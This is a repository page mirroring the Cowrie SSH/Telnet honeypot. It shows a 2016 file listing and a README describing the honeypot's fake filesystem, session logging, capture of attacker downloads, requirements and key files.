Rooba
/
cowrie
mirror of https://github.com/cowrie/cowrie.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io
1,194 Commits 1 Branch 21 Tags 58 MiB
Python 98.4%
Shell 0.7%
Makefile 0.5%
Dockerfile 0.4%
Go to file
Michel Oosterhof 21e5ba8b5a i think travis gets upset about pycrypto 2016-09-05 02:23:18 +04:00
bin fixed do_chgrp in fsctl so it changes GID instead of UID (#220) 2016-08-11 13:04:58 +03:00
cowrie Fix #243: don't log passwd change as file download 2016-09-05 01:22:00 +04:00
data add correct entry for / 2016-01-13 19:09:48 +04:00
dl Added 'empty' folders … 2014-05-28 05:00:21 +01:00
doc add documentation to systemd entry 2016-07-28 15:17:34 +04:00
honeyfs Basic Telnet support implemented 2016-08-22 15:56:53 +04:00
log/tty Added 'empty' folders … 2014-05-28 05:00:21 +01:00
twisted/plugins split off factory from transport. 2016-09-04 22:36:54 +04:00
txtcmds add empty output for stty 2016-04-16 10:11:54 +00:00
.gitattributes cowrie rename 2015-05-12 14:57:29 +00:00
.gitignore ignore macosx files 2016-01-17 10:33:08 +04:00
.travis.yml roll back trial change 2016-09-05 00:44:11 +04:00
CHANGELOG.md telnet changelog 2016-08-22 16:08:49 +04:00
INSTALL.md add note about raspberry pi installation (#236) 2016-09-05 01:12:32 +04:00
README.md update README 2016-08-22 17:14:17 +04:00
cowrie.cfg.dist listen_ssh_addr -> listen_addr 2016-08-22 12:07:24 +00:00
requirements.txt i think travis gets upset about pycrypto 2016-09-05 02:23:18 +04:00
start.sh start.sh and requirements improvements & no moduli fail fix with key exchanges (#194) 2016-06-19 17:36:48 +04:00
stop.sh Remove "\n" in stop.sh. 2016-02-18 12:12:50 +08:00

README.md

Cowrie

Cowrie is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker.

Cowrie is developed by Michel Oosterhof.

Features

Some interesting features:

  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can cat files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in an UML Compatible format for easy replay with original timings
  • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection

Additional functionality over standard kippo:

  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Forward SMTP connections to SMTP Honeypot (e.g. mailoney)
  • Logging in JSON format for easy processing in log management solutions
  • Many, many additional commands

Requirements

Software required:

  • Python 2.7+, (Python 3 not yet supported due to Twisted dependencies)
  • Zope Interface 3.6.0+
  • Twisted 12.0+
  • python-crypto
  • python-cryptography
  • python-pyasn1
  • python-gmpy2 (recommended)
  • python-mysqldb (for MySQL output)
  • python-OpenSSL

Files of interest:

  • cowrie.cfg - Cowrie's configuration file. Default values can be found in cowrie.cfg.dist
  • data/fs.pickle - fake filesystem
  • data/userdb.txt - credentials allowed or disallowed to access the honeypot
  • dl/ - files transferred from the attacker to the honeypot are stored here
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here or use bin/fsctl
  • log/cowrie.json - transaction output in JSON format
  • log/cowrie.log - log/debug output
  • log/tty/*.log - session logs
  • txtcmds/ - file contents for the fake commands
  • bin/createfs - used to create the fake filesystem
  • bin/playlog - utility to replay session logs

Is it secure?

Maybe. See FAQ

I have some questions!

Please visit https://github.com/micheloosterhof/cowrie/issues

Contributors

Many people have contributed to Cowrie over the years. Special thanks to:

  • Upi Tamminen (desaster) for all his work developing Kippo on which Cowrie was based